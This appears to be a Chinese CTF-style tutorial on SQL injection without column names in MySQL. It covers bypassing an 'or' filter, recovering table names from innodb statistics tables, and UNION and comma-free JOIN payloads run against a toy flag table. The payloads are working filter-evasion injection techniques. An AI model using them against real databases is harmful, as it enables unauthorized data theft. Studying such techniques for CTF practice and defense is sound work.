前言
当sql过滤了or时,无法从information_schema数据库查出列名。但是存在innodb_index_stats、innodb_index_table两张表(mysql版本大于5.6.3),可以查询出表名,再进行无列名注入
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-3.html
示例
题目语句为 select * from test where id=x
当前数据库有两张表
flllllag
| id | flag |
|---|---|
| 1 | flag{3690c6f6-fe49-11e9-bf58-005056c00001} |
test
| id | title | content |
|---|---|---|
| 1 | hello | tinmin |
flllllag表有两列,
有:
1 | mysql> select 1,2 union select * from flllllag; |
select 1,2 union select * from flllllag
1 2 2 flag{3690c6f6-fe49-11e9-bf58-005056c00001}
test表 三列
union select 要保持列一样
- select 1,
`2`,3 from (select 1,2 union select * from flllllag)
`2` 指取from结果的第二列
| 1 | 2 | 3 |
|---|---|---|
| 1 | 2 | 3 |
| 1 | flag{3690c6f6-fe49-11e9-bf58-005056c00001} | 3 |
select * from test union select 1,
`2`,3 from (select 1,2 union select * from flllllag)a;
结果就是:
| id | title | content |
|---|---|---|
| 1 | hello | tinmin |
| 1 | 2 | 3 |
| 1 | flag{3690c6f6-fe49-11e9-bf58-005056c00001} | 3 |
过滤逗号
回顾过滤逗号的语句
select * from test union select 1,2,3
等同于
select * from test union select * from (select 1)a join (select 2)b join (select 3)c
回到语句
select * from test union select 1,
2,3 from (select 1,2 union select * from flllllag)a;
- select * from test union select * from (select 1)a join (select 2)b join(select
2from (select 1,2 union select * from flllllag)i)k;
` 叫 backticks
平时sql语句喜欢用:
select id from user
规范写法:
select
`id`from user
同样为查询id列
2是查询表头为2的列
还可以
选取列查
1 | select * from (select 1,2)a |
| 1 | 2 |
|---|---|
| 1 | 2 |
1 | select a.1 from (select 1,2)a |
| 1 |
|---|
| 1 |
1 | select a.2 from (select 1,2)a |
| 2 |
|---|
| 2 |
保证join一列
- select * from test union select * from (select 1)a join (select 2)b join(select i.2 from (select 1,2 union select * from flllllag)i)k;
